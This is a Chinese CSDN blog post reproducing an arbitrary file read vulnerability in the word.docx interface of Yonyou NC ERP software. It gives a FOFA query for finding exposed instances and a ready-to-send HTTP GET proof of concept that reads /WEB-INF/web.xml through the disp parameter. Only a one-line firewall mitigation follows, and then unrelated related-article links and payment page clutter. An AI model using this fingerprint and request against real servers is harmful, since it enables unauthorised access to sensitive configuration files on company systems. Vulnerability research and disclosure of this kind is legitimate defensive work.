用友NC word.docx任意文件读取漏洞

最新推荐文章于 2024-09-14 18:32:11 发布
最新推荐文章于 2024-09-14 18:32:11 发布
阅读量376 收藏
点赞数
分类专栏: 漏洞复现 文章标签: word 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135019496
版权

文章目录

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

app="用友-UFIDA-NC"

在这里插入图片描述

漏洞利用

Poc:

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

在这里插入图片描述

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

3tefanie丶zhou
关注
专栏目录
用友NC word.docx接口存在任意文件读取漏洞 附POC
nnn2188185的博客
11-26 316
用友NC word.docx接口存在任意文件读取漏洞 附POC
用友NC word.docx 任意文件读取漏洞复现
0xSec
01-06 1126
用友NC 系统word.docx接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
用友NC word.docx接口存在任意文件读取漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-04 672
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。
漏洞复现】用友NC word.docx 任意文件读取漏洞
qq_67810151的博客
04-13 351
用友NC word.docx 接口存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞进行任意文件读取,造成服务器敏感信息泄露。
【0day】用友NC portal接口任意文件读取漏洞学习
记录并分享学习安全的知识点..
10-15 371
Yonyou NC是一款成熟的企业管理软件,已经在国内外众多企业中得到广泛应用。它具有完善的功能、稳定的性能、丰富的经验和优秀的服务,可以帮助企业提高管理效率、降低成本、提升竞争力。用友NC portal接口存在任意文件读取漏洞,攻击者可以在未经授权的情况下读取系统上的任意文件
NC 6 portal端登录时密码框输入字符跳动
东风流浪
08-03 343
若IE浏览器版本为IE11,portal端登录时密码框输入字符跳动因浏览器版本兼容性问题,需要将home\hotwebs\portal\sync\websm\pserver\html\nodes\login\uimeta.jsp文件中,<head>中 <meta http-equiv="X-UA-Compatible" content="IE=8,9" /> 修...
用友portal接口存在任意文件读取漏洞
waxcj的博客
01-22 563
用友portal接口存在任意文件读取漏洞
用友NC任意文件读取
voctor2436的博客
05-24 1290
用友NC产品的全新系列、是面向集团企业的世界级高端管理软件,用友NC6的产品定位于大型企业管理与电子商务平台。用友NCFindWeb文件存在任意文件读取漏洞,攻击者通过漏洞可以获取网站源码,导致服务器失陷。用友NC采用J2EE架构和先进开放的集团级开发平台UAP,形成了集团管控8大领域15大行业68个细分行业的解决方案。一般性的建议:关注官方新版本的发布及补丁更新,建议使用对应WAF/IPS进行防护。
用友移动管理系统 任意文件上传
m0_46317063的博客
08-21 294
用友移动管理系统 任意文件上传漏洞[2023-HW 0DAY]
漏洞复现--用友GRP-U8-FileUpload任意文件上传
qq_53003652的博客
12-26 664
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞。访问/R9iPortal/upload/test.jsp。
漏洞复现】用友-U9-PatchFile-任意文件上传
知黑而守白
01-12 332
用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友U9多组织企业互联网应用平台 PatchFile 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
唯徳知识产权管理系统 DownloadFileWordTemplate 文件读取漏洞复现
0xSec
09-14 407
唯徳知识产权管理系统 DownloadFileWordTemplate 接口存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Word使用手册
XuanyuXiang
09-13 644
WORD使用手册。
拖放WORD文件朗读全文
2401_82434226的博客
09-13 296
WORD拖放到tkinter的窗口,就可以朗读整改word文件的内容。要注意word文件没有被打开。
【研赛论文】数学建模2024华为杯论文word/latex模板
RS_handy的博客
09-11 1457
国赛结束,研究生瞩目的研赛马上就要来了,相信研究生同学也是在努力的准备当中,在这里祝愿大家能够获得一个好的名次。一举冲出重围,拿下国奖。在数模比赛当中,论文是参赛者唯一能够与评阅老师进行沟通的方式,所以一篇论文所展现的内容也代表了参赛者本人以及团队的面貌。在这里我们简单整理了一个国赛的word和Latex模板,从内容到参考文献都可以一键生成式完成格式设置内容。
前端下载word、excel文件的两种方法
y1059477028的博客
09-14 387
dataManager/export为导出接口,get请求。备注:url如果直接在浏览器中打开,则直接下载文件
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8461
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
vpn集中配置方法.docx
最新发布
09-17
cisco设备配置指导
吉他谱_What's My Age Again - Blink-182.pdf
09-17
初级入门吉他谱 guitar tab
word2010打不开.docx文件
07-12
您好!对于 Word 2010 打不开 .docx 文件的问题,您可以尝试以下几个解决方法: 1. 检查文件扩展名:确保文件扩展名为 .docx 而不是其他格式的扩展名。如果文件扩展名不正确,可以尝试更改为 .docx。 2. 更新 Microsoft Office:确保您的 Word 2010 版本已经更新到最新版本。打开 Word,点击“文件”选项卡,选择“帮助”并点击“检查更新”。 3. 使用修复工具:Word 2010 提供了一个修复工具,可以尝试修复损坏的文件。在开始菜单中搜索“Microsoft Office 工具”并打开“Microsoft Office 文件验证”。 4. 尝试打开其他 .docx 文件:如果只有某个特定的 .docx 文件打不开,而其他文件可以正常打开,那么可能是该文件本身出现了问题。您可以尝试从备份或其他来源获取相同的文件并尝试打开。 5. 使用其他软件打开:如果以上方法都无法解决问题,您可以尝试使用其他软件(如 LibreOffice、Google Docs 等)来打开 .docx 文件,以确定是否是 Word 本身的问题。 如果以上方法都无法解决问题,可能需要进一步检查您的系统和软件设置,或考虑联系 Microsoft 支持寻求进一步的帮助。希望这些方法能对您有所帮助!如果还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值